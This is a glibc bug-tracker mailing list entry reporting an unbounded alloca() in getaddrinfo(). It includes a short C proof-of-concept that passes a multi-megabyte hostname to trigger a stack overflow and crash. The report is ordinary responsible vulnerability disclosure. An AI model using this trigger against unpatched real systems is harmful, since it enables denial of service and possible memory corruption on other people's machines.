This is the mail archive of the
glibc-bugs@sourceware.org
mailing list for the glibc project.
[Bug libc/11884] New: Unbound alloca() in node parameter of getaddrinfo()
- From: "cdn at chromium dot org" <sourceware-bugzilla at sourceware dot org>
- To: glibc-bugs at sources dot redhat dot com
- Date: 5 Aug 2010 05:12:10 -0000
- Subject: [Bug libc/11884] New: Unbound alloca() in node parameter of getaddrinfo()
- Reply-to: sourceware-bugzilla at sourceware dot org
getaddra() uses the provided node parameter to determine the size of an
alloca(). When compiled without the -fstack-check option alloca() will be
inlined as "SUB esp, size". For large values of size this can result in several
consequences which allow subsequent writes to the stack to overwrite arbitrary
memory.
The following POC can be used to demonstrate this vulnerability.
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
void main(int argc, char **argv) {
struct addrinfo hints, *res;
char serv[] = "";
char *host;
host = mmap(0, atoi(argv[1]), PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
memset(host, 0x41, atoi(argv[1]));
host[atoi(argv[1]) - 1] = '\0';
memset ((char *)&hints, 0, sizeof (hints));
hints.ai_family = PF_INET;
hints.ai_socktype = SOCK_STREAM;
getaddrinfo(host, 0, &hints, &res);
exit(0);
}
On a 32bit arch try values in the range of 9mb to demonstrate a crash.
--
Summary: Unbound alloca() in node parameter of getaddrinfo()
Product: glibc
Version: 2.9
Status: NEW
Severity: critical
Priority: P2
Component: libc
AssignedTo: drepper at redhat dot com
ReportedBy: cdn at chromium dot org
CC: cdn at chromium dot org,glibc-bugs at sources dot redhat
dot com
http://sourceware.org/bugzilla/show_bug.cgi?id=11884
------- You are receiving this mail because: -------
You are on the CC list for the bug, or are watching someone who is.